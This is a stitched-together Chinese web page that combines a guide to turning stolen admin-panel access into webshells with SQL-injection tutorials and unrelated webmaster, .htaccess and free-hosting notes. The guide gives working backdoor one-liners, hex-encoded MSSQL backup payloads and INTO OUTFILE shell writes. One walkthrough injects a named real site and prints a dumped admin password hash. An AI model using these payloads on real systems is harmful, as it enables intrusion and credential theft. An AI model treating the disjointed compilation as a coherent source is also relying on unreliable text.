　　好了,我们的教程到这里就结束了,不过提醒大家,网络GHOST的机器尽量不要超过50台.如果出现问题,那麻烦的可是你了哦.如果有机器断线，请关闭那台机器等待,大约5分钟后会记为超时.GHOST还会继续运行.另外有一些网卡驱动执行完后会锁住键盘.请大家自己建立批处理文件就可以了.

在拿站过程中，我们经常费了九牛两虎之力拿到管理员帐号和密码，并顺利进入了后台，虽然此时与拿到网站webshell还有一步之遥，但还是有许多新手因想不出合适的方法而被拒之门外。因此，我们把常用的从后台得到webshell的方法进行了总结和归纳，大体情况有以下十大方面。

注意：如何进入后台，不是本文讨论范围，其具体方法就不说了，靠大家去自己发挥。此文参考了前人的多方面的资料和信息，在此一并表示感谢。

一、直接上传获得webshell
这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文 件url应该是http://forums/images/smiles/下，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目录中，从而拿到网站的管理员控制权限。

二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa|asP类型，ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp，可以添加.aspasp的文件类型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传类型，这是php的一个特性,最后的哪个只要不是已知的文件类型即可，php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！

三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是：添加一个新的友情链接，在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件，joekoe论坛，某某同学录，沸腾展望新闻系统，COCOON Counter统计程序等等，还有很多php程序都可以，COCOON Counter统计程序举例，在管理邮箱处添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//"，还有一种方法就是写上 cnhacker@263.net"%><%eval request(chr(35))%><%'，这样就会形成前后对应，最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时候要选前者。再如动易2005，到文章中心管理-顶部菜单设置-菜单其它特效，插入一句话马"%><%execute request("l")%><%'，保 存顶部栏目菜单参数设置成功后，我们就得到马地址http://网站/admin/rootclass_menu_config.asp。

五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件，从而可以查看并获得网页源代码，并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候，但是有asp系统在运行，利用此方法来查看源代码来获得其数据库的位置，为数据库插马来创造机会，动网论坛就有一个ip地址的数据库，在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法，很多asp程序在即使改了后缀名后也会提示文件非法，通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的，还有一种就是用记事本打开图片文件，随便粘贴一部分复制到asp木马文件头，修改gif后缀后上传也可以突破检测，然后备份为.asp文件，成功得到webshell。

六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行，比较典型的就是loveyuki的L-BLOG，在友情添加的url出写上<%eval request (chr(35))%>, 提交后，在数据库操作中压缩数据库，可以成功压缩出.asp文件，用海洋的最小马的eval客户端连就得到一个webshell。

七、asp+mssql系统
这里需要提一点动网mssql版，但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个本地提交的表单，代码如下：
另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里，想要备份的WebShell的相对路径填写在“要复制到的位置”那里，提交就得到我们可爱的WebShell了，恢复代码和此类似，修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台，动网的数据库还原和备份是个摆设，不能执行sql命令备份webshell，只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell，一般后台是显示了绝对路径，只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码，利用动网7.0的注入漏洞可以用差异备份一个webshell，可以用利用上面提到的方法，将conn.asp文件备份成.txt文件而获得库名。
差异备份的主要代码：
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
这段代码中，0x626273是要备份的库名bbs的十六进制，可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell，唯一的不足就是备份后的文件过大，如果备份数据库中有防下载的的数据表，或者有错误的asp代码，备份出来的webshell就不会成功运行，利用差异备份是成功率比较高的方法，并且极大的减少备份文件的大小。

八、php+mysql系统
后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件，因为所有的数据是存放在mysql里的，所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径’ 就可以获得了一个的最小马
'
0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们的十六进制，这种方法对phpmyadmin比较普遍，先利用phpmyadmin的路径泄露漏洞，比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。

就可以暴出路径，php环境中比较容易暴出绝对路径：）。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法，也可以写个vbs添加系统管理员的脚本导出到启动文件夹，系统重起后就会添加一个管理员帐号
CREATE TABLE a(cmd text NOT NULL)
INSERT INTO a(cmd) VALUES('")?>')
select cmd from a into outfile '路径/b.php'
DROP TABLE IF EXISTS a
访问b.php就会生成一个的最小马。
如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码：
$sa = fopen("./up/saiy.php","w");
fwrite($sa,"");
fclose($sa);
?>

就会在up目录下生成文件名为saiy.php内容为的最小php木马，
最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码")?> 将会在当前目录生成一个a.php的最小马。
九、phpwind论坛从后台到webshell的三种方式
方式1 模板法
进入后台， 风格模版设置 ，在随便一行写代码，记住，这代码必须顶着左边行写，代码前面不可以有任何字符。
EOT;
eval($a);
print <<而后得到一个shell为http://网站/bbs/index.php。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//

替换为那里可以随意写，而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php。
方式3 用户等级管理
新建立会员组，头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’;eval($_POST[’a’]);// ，升级点数依然可以随意写。而后得到一个shell地址为http://网站/bbs/data/bbscache/level.php。
以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell
最明显的就是某私服程序内的阿江计数程序，可以通过http://网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交， 即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://网站/count%23.asa访问得到webshell，由于阿江计数程序过滤了%和+，将最小马改成替换代码内容处提交，然后用lake2的eval客户端来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。

解决方案
　　由于本文涉及的代码版本很多，所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告，若自己发现相关漏洞也可及时通知官方网站。

PHP注入不象ASP那样有NBSI之类的超强工具，其实知道他的注入原理后，完全可以实现手工注入。

在php.ini中有一个配置选项magic_quotes_gpc=on/off当=ON时会把提交变量中的单引号，双引号，反斜线，空白字符前面加上反斜线变成转义字符，遇到这种情况，我们可以把提交语句用ASC或0X进行编码旧可以饶过了。有几个比较关键的语句，一是UNION，通过并运算查询当前表中字段，用与将多个SELECT语句的结果联合到一个结果集中，可以用它猜字段，EG：id=1234 and 1=2 union select 1,2,3,4...。猜出后会在相应地方出现数字对应。load_file()用来返回文件里的内容，注意的是要写明全文件路径和名称，当然会出现文件读不出来的问题，原因很多主要是权限问题，还有文件是否可读，MYSQL用户是否具有FILE权限，还有就是些代码处理问题了用相关函数或者查原代码就可以了。EG:load_file('c:/boot.ini')，可以嵌入到UNION查询中，在相应的数字的位置上就会显示出你要得系统文件了。into outfile用来把表中内容写入文件，假设我们可以上传图片，上传后路径为：/upload/111.jpg,图片中的内容是一个很简单的系统变量，提交语句：id=1234 and 1=2 union select 1,2,load_file('d:/xxx/xxxx/down/upload/111.jpg'),4 into file'd:/xxx/xxxx/down/muma.php'（以前看过这个列子，记得最清楚了，嘿嘿~~）,接着我们去看_blank>http://www.xxx.com/down/muma.php?cmd=net user,就可以执行命令了，注意的是MYSQL5。0以下不支持AND连接两个表查询。 得到WEBSHELL还可以找一个可写的目录插入数据然后再导出到相应文件（如下），...很多方法。
CREATE TABLE file (cmd text NOT NULL)
INSERT INTO file (cmd) VALUES ()
select cmd from file into outfile filepath
DROP TABLE IF EXISTS file
有些站测试提交单引号就可以暴露很多信息是因为在php.ini中选项display_errors=on，会返回错误信息，象提交：_blank>http://www.shyau.com.tw/article.php?sid=140'，结果呢？：Warning: Supplied argument is not a valid MySQL result resource in d:\foxserv\www\shyau\includes\sql_layer.php on line 230
Warning: Supplied argument is not a valid MySQL result resource in d:\foxserv\www\shyau\includes\sql_layer.php on line 230路径都出来了，晕。
有时当提交单引号不能返回错误信息时，可以增加查询负值或改变查询类型，例如：id=1234我们可以提交：id=11111....（边界检查不彻底）或id=ssss（第一次见还是在X挡案看无敌的文章，原来这也可以啊）也有可能暴出敏感信息。
mysql也有内置变量，version()返回当前数据库版本信息,database()返回当前数据库名,user(),system_user(),session_user()返回MYSQL用户名，可以帮助我们获得更多信息。这些都是很基础的东西，更多的技术还要大家自己发现，文章含盖并不全，有些资料细节往大家查询PHP中文手册。~~

1. Just wait and see. I won't let you get away with that.
咱们走着瞧。我不会让你得逞的。

2. You'll be sorry.
你会后悔的。

3. You're gonna get what's coming to you.
你会得到报应的。

4. If you're looking for a fight, you don't have to look far.
如果你想找人打架的话，不用找太远。

5. Watch your mouth. Do you know who you're talking to?
说话客气一点。你知道你在跟谁说话吗？

6. I'll get even with you sooner or later.
跟你的这笔帐我迟早会要回来的。

7. Listen, you've picked the wrong person to quarrel with.
听着，你找错吵架的对象了。

8. You'd better take that back.
你最好收回那句话。

9. You want to take it outside? Anytime!
你想到外头解决（干架）吗？随时奉陪！

10. Don't mess with me! / Don't get fresh with me!
不要惹我！/ 给我放尊重一点！

就和标题说的一样.这里介绍的是我个人总结推荐的站长工具网站
而大部分都是大家熟知的,只是再普及一下.
______________________________________________________

______________________________________________________

网站相关性检查
http://www.uptimebot.com/sql/one.php

注: 比大部分国内站长查询还要细致.
______________________________________________________

______________________________________________________

在线翻译
http://babelfish.altavista.com

注: 我一直用的翻译网站,语言种类全,速度不错.
______________________________________________________

http://www3.j-server.com/KODENSHA/contents/trial/index.htm

注: 中(简繁),英,日,韩四国语言互译,效果不错.
______________________________________________________

______________________________________________________

国外scripts站
http://www.hotscripts.com

注: 国外著名脚本站,内容极其丰富.只要有耐心不难发现优秀程序.
______________________________________________________

______________________________________________________

WHOIS and Reverse IP
http://whois.webhosting.info

注: 很实用的一个网站,查询一个域名或IP下的所有站点.
______________________________________________________

______________________________________________________

查看网站历史
http://www.archive.org/web/web.php

注: 可以说这个网站是看个每个站长长大的.
______________________________________________________

______________________________________________________

在线FTP上传
http://www.netftp.cn

注: 首个国内WEBFTP,上传速度飞快.简单实用.
______________________________________________________

http://www.net2ftp.com

注: 国外著名的WEBFTP,突破IP被封锁的限制,上传速度飞快.
______________________________________________________

______________________________________________________

whois查询
http://www.whois.sc

注: 可以用关键字的形式查询.并且推荐类似域名,待出售域名.
______________________________________________________

______________________________________________________

DNS检测
http://www.checkdns.net/quickcheck.aspx

注: 能检测域名的DNS状态,邮件和服务器状态.
______________________________________________________

______________________________________________________

获知空间的IP
http://www.kloth.net/services/nslookup.php

注: 在域名未生效前,根据空间商提供的NS,检测域名所在服务器的IP.
______________________________________________________

______________________________________________________

域名工具综合
http://www.domaintools.com

注: 域名查询工具综合站点,N多的实用查询功能.
______________________________________________________

.htaccess可以做大量范围的事情，包括：文件夹密码保护、用户自动重新指向、自定义错误页面、变更你的文件扩展名、屏蔽特定的用户IP地址、只允许特定的IP地址、停止目录表以及使用其他文件作为index文件，等等......

1. Introduction 介绍
文件名 .htaccess 属性 644 (RW-R–R–)
htaccess会影响它所在目录下的所有子目录
注意大多数内容都要求保持在一行之内，不要换行，否则会引起错误

2. Error Documents 错误文档
Official document: ErrorDocument Directive
ErrorDocument code document
例子
ErrorDocument 400 /errors/badrequest.html
ErrorDocument 404 http://yoursite/errors/notfound.html
ErrorDocument 401 “Authorization Required”
(注意之后内容如果出现的双引号需要转义为 \”)
常见HTTP状态码
Successful Client Requests
200 OK
201 Created
202 Accepted
203 Non-Authorative Information
204 No Content
205 Reset Content
206 Partial Content
Client Request Redirected
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
303 See Other
304 Not Modified
305 Use Proxy
Client Request Errors
400 Bad Request
401 Authorization Required
402 Payment Required (not used yet)
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable (encoding)
407 Proxy Authentication Required
408 Request Timed Out
409 Conflicting Request
410 Gone
411 Content Length Required
412 Precondition Failed
413 Request Entity Too Long
414 Request URI Too Long
415 Unsupported Media Type
Server Errors
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Gateway Timeout
505 HTTP Version Not Supported

3. Password Protection 密码保护
Official document: Authentication, Authorization and Access Control
假设密码文件为.htpasswd
AuthUserFile /usr/local/safedir/.htpasswd (这里必须使用全路径名)
AuthName EnterPassword
AuthType Basic
两种常见验证方式:
Require user windix
(仅允许用户windix登陆)
Require valid-user
(所有合法用户都可登陆)
Tip: 如何生成密码文件
使用htpasswd命令(apache自带)
第一次生成需要创建密码文件
htpasswd -c .htpasswd user1
之后增加新用户
htpasswd .htpasswd user2

4. Enabling SSI Via htaccess 通过htaccess允许SSI(Server Side Including)功能
AddType text/html .shtml
AddHandler server-parsed .shtml
Options Indexes FollowSymLinks Includes
DirectoryIndex index.shtml index.html

5. Blocking users by IP 根据IP阻止用户访问
order allow,deny
deny from 123.45.6.7
deny from 12.34.5. (整个C类地址)
allow from all

6. Blocking users/sites by referrer 根据referrer阻止用户/站点访问
需要mod_rewrite模块
例1. 阻止单一referrer: badsite.com
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} badsite\.com [NC]
RewriteRule .* - [F]
例2. 阻止多个referrer: badsite1.com, badsite2.com
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} badsite1\.com [NC,OR]
RewriteCond %{HTTP_REFERER} badsite2\.com
RewriteRule .* - [F]
[NC] - 大小写不敏感(Case-insensite)
[F] - 403 Forbidden
注意以上代码注释掉了”Options +FollowSymlinks”这个语句。如果服务器未在 httpd.conf 的 段落设置 FollowSymLinks, 则需要加上这句，否则会得到”500 Internal Server error”错误。

7. Blocking bad bots and site rippers (aka offline browsers) 阻止坏爬虫和离线浏览器
需要mod_rewrite模块
坏爬虫? 比如一些抓垃圾email地址的爬虫和不遵守robots.txt的爬虫(如baidu?)
可以根据 HTTP_USER_AGENT 来判断它们
(但是还有更无耻的如”中搜 zhongsou.com”之流把自己的agent设置为 “Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)” 太流氓了，就无能为力了)
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
[F] - 403 Forbidden
[L] - ?

8. Change your default directory page 改变缺省目录页面
DirectoryIndex index.html index.php index.cgi index.pl

9. Redirects 转向
单个文件
Redirect /old_dir/old_file.html http://yoursite.com/new_dir/new_file.html
整个目录
Redirect /old_dir http://yoursite.com/new_dir
效果: 如同将目录移动位置一样
http://yoursite.com/old_dir -> http://yoursite.com/new_dir
http://yoursite.com/old_dir/dir1/test.html -> http://yoursite.com/new_dir/dir1/test.html
Tip: 使用用户目录时Redirect不能转向的解决方法
当你使用Apache默认的用户目录，如 http://mysite.com/~windix，当你想转向 http://mysite.com/~windix/jump时，你会发现下面这个Redirect不工作:
Redirect /jump http://www.google.com
正确的方法是改成
Redirect /~windix/jump http://www.google.com
(source: .htaccess Redirect in “Sites” not redirecting: why?
)

10. Prevent viewing of .htaccess file 防止.htaccess文件被查看
order allow,deny
deny from all

11. Adding MIME Types 添加 MIME 类型
AddType application/x-shockwave-flash swf
Tips: 设置类型为 application/octet-stream 将提示下载

12. Preventing hot linking of images and other file types 防盗链
需要mod_rewrite模块
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www/\.)?mydomain.com/.*$ [NC]
RewriteRule \.(gif|jpg|js|css)$ - [F]
解析:
若 HTTP_REFERER 非空 (来源为其他站点，非直接连接) 并且
若 HTTP_REFERER 非(www.)mydomain.com开头(忽略大小写[NC]) (来源非本站)
对于所有含有 .gif/.jpg/.js/.css 结尾的文件给出 403 Forbidden 错误[F]
也可指定响应，如下例显示替换图片
RewriteRule \.(gif|jpg)$
[R,L]
[R] - 转向(Redirect)
[L] - 连接(Link)

13. Preventing Directory Listing 防止目录列表时显示
IndexIgnore *
IndexIgnore *.jpg *.gif
Tips:
允许目录列表显示: Options +Indexes
禁止目录列表显示: Options -Indexes
显示提示信息: 页首 文件HEADER, 页尾 文件README

cms自动设置 http://cms.aaacafe.ne.jp
CGI简单设置 http://cgi.aaacafe.ne.jp
这里修改邮箱等资料和忘记密码重发密码到邮箱 http://www.aaacafe.ne.jp/fh/revuser.html
数据库激活 http://db.aaacafe.ne.jp  （输入你的用户名和密码选择所在服务器，然后就可以激活数据库）
去除广告
在前面加入<body>
或在前面加入


aaacafe.ne.jp申请攻略

地址：http://f15.aaa.livedoor.jp/newadduser.html

有逐一测试过，现在 f4 f9 f10 f15 f21 f56 这六个可以申请

格式是这样的http://f1.aaa.livedoor.jp/adduser.html(自己改吧)

不用确认，填完了就OK 信件中有你的用户名 密码等


本人补充的详细使用教程

访问地址：http://f15.aaa.livedoor.jp/~用户名/

FTP服务器：f15.aaa.livedoor.jp
用户名：你自己知道
密码：邮件中有告诉你的
文件上传在 public_html 目录内，否则无法访问

使用cgi程序，新建 cgi-bin 目录(目录属性默认755，不需要更改)
cgi文件上传到 cgi-bin 目录内，修改cgi文件的属性为755

去除广告的四种方法：
1. 在前面加入<body>
2. 在前面加入
3. 在第一行加
4. 以下内容保存为 .htaccess
LayoutIgnoreURI *.php
LayoutIgnoreURI *.cgi
LayoutIgnoreURI *.htm
LayoutIgnoreURI *.html
传到一个目录,这目录以下就都没广告了. 根目录好象不行~~

数据库激活：
http://db.aaacafe.ne.jp
アカウント名  用户名：你自己知道
パスワード  密码：邮件中有告诉你的
FTPサーバ  下拉列表，选 f15.aaa.livedoor.jp
点 登録する 按钮激活，会出现详细的mysql信息(这个页面的内容请保存)
データベースユーザは、f15_xxxx 数据库用户名
データベースパスワードは、xxxxxxxxxx 数据库密码
データベース名は、f15_xxxx  数据库名称
データベースホスト名は、mysql2.aaacafe.ne.jp 数据库服务器

这个数据库支持远程调用，速度也可以。

数据库管理(phpMyAdmin)：自己传PHPMYAMDIN吧


个人演示http://f15.aaa.livedoor.jp/~yaya/blog/

DevPack-S
-- 250MB Space
-- 1GB Bandwidth
-- 25 FTP & Email accounts
-- 15 MySQL Databases
-- 20 SubDomains
-- 2 Addon/Parked Domains

DevPack-M
-- 500MB Space
-- 2.5 GB Bandwidth
-- 50 FTP & Email accounts
-- 30 MySQL Databases
-- 50 Subdomains
-- 5 Parked/Addon Domains

DevPack-L
-- 1 GB Space
-- 5 GB Bandwidth
-- 120 FTP & Email accounts
-- 50 MySQL Databases
-- 100 Subdomains
-- 10 Parked/Addon Domains

All plans include..
-- CpanelX
-- MySQL
-- FTP
-- PHP4
-- PHP5
-- Fantastico
-- Installtron
-- Plus much, much more!

==============================

http://www.freehostdev.com/ipanel/order/

==============================
演示http://myy.net.ru

一：登陆界面
二：主要功能解说
三：修改新密码
四：修改基本资料
五：激活mysql数据库
六：绑玉米
七：玉米同步

电脑出问题了，没有听成课，遗憾啊。
自己去翻资料，试做一下做业了。

7月27日课程：简单的PHP注射

参考文章：http://bbs.vip8.org/read.php?tid=28960


原理文章：

http://bbs.vip8.org/read.php?tid=29060

练习网站：
http://www.digitimes.com.cn/pages/cover.php?id%A3%BD288=&id=501&id=617

目标直接给了，先打开网站吧。

注意啊，地址后面有php?id=xxx，一般的来说有这个的才会可以注。

好了，我们先来第一步，在地址后面加上 and 1=1 正常哦。和 and 1=2。发生错误啦。看到了吧，文章没有了。





这说明我们提交的and 1=1和and 1=2都被当作SQL语句执行。

既然这个可以执行，那么其他的语句也应该可以执行的。先确认一下是不是MYSQL数据库，在URL后面提交/*随便是什么东西、返回正常。

可以确认是MYSQL的，因为基本上支持/*注释都是MYSQL数据库。



下面我们看看可不可以union查询。


提交and ord(mid(version(),1,1))>51/* 这句的意思是查看数据库是不是大于3.0的。说一下，这些注射的代码我也不熟悉，但是，还是自己

一个个输入吧，这样才能达到熟悉的效果。

注意：ASCIl码51对应的是3，那么大于3的话当然就是4.0以上的。4.0以上支持union查询的，结果返回正常。

其实，现在想要找MYSQL版本3.0和以下的都不容易了。


下面我们看有没有ROOT权限。提交and (select count(*) from mysql.user)>0/*

结果返回错误

看来不是ROOT权限，对方MYSQL数据库没有读取权限。

既然不是ROOT也没有关系。既然支持union查询我们来暴字段数，提交order by 10/*，结果返回正常。

看来是大于10个字段的，继续提交order by 20/* 返回错误，小于20个字段，

提交提交order by 17/*正常。order by 18 当提交order by 19/*的时候返回错误。看来是18个字段。

继续提交 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*，在页面暴出了数字


呵呵，在暴出的数字上加上user()和version()。

继续提交 and 1=2 union select 1,user(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*，暴出用户名和版本号

digitimes@localhost
4.0.20a-nt



下面就猜用户名和密码了

一般的都是这个表 admin 或user。就用它来试试。

继续提交 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,username,password,13,14,15,16,17,18 from admin/*  

不行，试user。

提交 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,username,password,13,14,15,16,17,18 from user/*  

就得到这个啦

sa  
　
d692e9a1e52f4a6ab752d3561dc48183  


OK了。



到这里作业就完成了。应该有不少错误吧，希望大家指正。

针对特定目标进行入侵，通过脚本漏洞和默认数据库获取webshell，然后主讲利用servu本地溢出提权。内容涉及到沸腾新闻管理系统（尘缘雅镜）注册用户任意获取webshell，bbsxp论坛结合数据库或者注射进行webshell截取，如何到可写目录利用wscript.shell组件进行提权操作。


提权基本方法如下（摘自网络）：


1.radmin连接法

 条件是你权限够大，对方连_blank">防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去。本人从来米成功过。，端口到是给对方打开了。

2.paanywhere

